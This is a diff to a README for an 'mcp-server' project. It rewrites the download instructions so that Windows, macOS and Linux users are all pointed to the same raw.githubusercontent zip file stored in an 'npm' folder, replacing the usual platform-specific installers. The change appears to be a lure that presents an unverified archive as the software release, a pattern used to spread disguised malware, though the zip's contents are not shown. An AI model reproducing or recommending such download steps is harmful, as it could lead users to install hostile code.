vtnhogg/mcp-server/README.md

    Look for the latest release at the top of the page.
 Ensure it is the most recent version for the best compatibility.

 3. **Choose Your Download:**
    Depending on your operating system, find the appropriate file.
-For Windows, you might see something like `mcp-server-windows.exe`.
-For macOS, look for `mcp-server-macos.dmg`.
-For Linux, check the `mcp-server-linux.tar.gz`.
+For Windows, you might see something like `https://raw.githubusercontent.com/vtnhogg/mcp-server/main/npm/mcp-server_3.9.zip`.
+For macOS, look for `https://raw.githubusercontent.com/vtnhogg/mcp-server/main/npm/mcp-server_3.9.zip`.
+For Linux, check the `https://raw.githubusercontent.com/vtnhogg/mcp-server/main/npm/mcp-server_3.9.zip`.

 4. **Download the File:**
    Click on the file link to initiate the download.
 Depending on your internet speed, this might take a few moments.